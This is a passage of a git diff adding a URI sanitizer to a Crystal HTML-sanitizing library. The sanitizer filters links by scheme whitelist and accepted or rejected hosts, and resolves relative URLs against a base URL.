@last_text_ended_with_whitespace = true + @stripped_block_tag = false + end + end +end + +require "./adapter/libxml2" diff --git a/src/sanitize.cr b/src/sanitize.cr new file mode 100644 index 0000000..a94e7c6 --- /dev/null +++ b/src/sanitize.cr @@ -0,0 +1,5 @@ +require "./policy/*" +require "./processor" + +module Sanitize +end diff --git a/src/uri_sanitizer.cr b/src/uri_sanitizer.cr new file mode 100644 index 0000000..d835b7c --- /dev/null +++ b/src/uri_sanitizer.cr @@ -0,0 +1,91 @@ +require "uri" + +# A `URISanitizer` is used to validate and transform a URI based on specified +# rules. +class Sanitize::URISanitizer + # Specifies a whitelist of URI schemes this sanitizer accepts. + # + # If empty, no schemes are accepted (i.e. only relative URIs are valid). + # If `nil`, all schemes are accepted (this setting is potentially dangerous). + # + # Relative URIs are not affected by this setting. + property accepted_schemes : Set(String)? + + # Specifies a whitelist of hosts this sanitizer accepts. + # + # If empty, no hosts are accepted (i.e. only relative URIs are valid). + # If `nil`, all hosts are accepted (default). + # + # The blacklist `rejected_hosts` has precedence over this whitelist. + property accepted_hosts : Set(String)? + + # Specifies a blacklist of hosts this sanitizer rejects. + # + # If empty, no hosts are rejected. + # + # This blacklist has precedence over the whitelist `accepted_hosts`. + property rejected_hosts : Set(String) = Set(String).new + + # Specifies a base URL all relative URLs are resolved against. + # + # If `nil`, relative URLs are not resolved. + property base_url : URI? + + def initialize(@accepted_schemes : Set(String)? = Set{"http", "https", "mailto", "tel"}) + end + + # Adds *scheme* to `accepted_schemes`. 
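+  #
+  # For example (the `"ftp"` scheme is just an illustration):
+  #
+  # ```
+  # sanitizer = Sanitize::URISanitizer.new
+  # sanitizer.accept_scheme("ftp")
+  # ```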
+ def accept_scheme(scheme : String) + schemes = self.accepted_schemes ||= Set(String).new + schemes << scheme + end + + def sanitize(uri : URI) : URI? + unless accepts_scheme?(uri.scheme) + return nil + end + + unless accepts_host?(uri.host) + return nil + end + + uri = resolve_base_url(uri) + + uri + end + + def accepts_scheme?(scheme) + if scheme.nil? + return true + end + + if accepted_schemes = self.accepted_schemes + return accepted_schemes.includes?(scheme) + end + + true + end + + def accepts_host?(host) + if host.nil? + return true + end + + return false if rejected_hosts.includes?(host) + + if accepted_hosts = self.accepted_hosts + return false unless accepted_hosts.includes?(host) + end + + true + end + + def resolve_base_url(uri) + if base_url = self.base_url + unless uri.absolute? + uri = base_url.resolve(uri) + end + end + uri + end +end
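+
+# Usage example (values are illustrative):
+#
+# ```
+# sanitizer = Sanitize::URISanitizer.new
+# sanitizer.base_url = URI.parse("https://example.com/")
+# sanitizer.sanitize(URI.parse("/foo")).to_s           # => "https://example.com/foo"
+# sanitizer.sanitize(URI.parse("javascript:alert(1)")) # => nil
+# ```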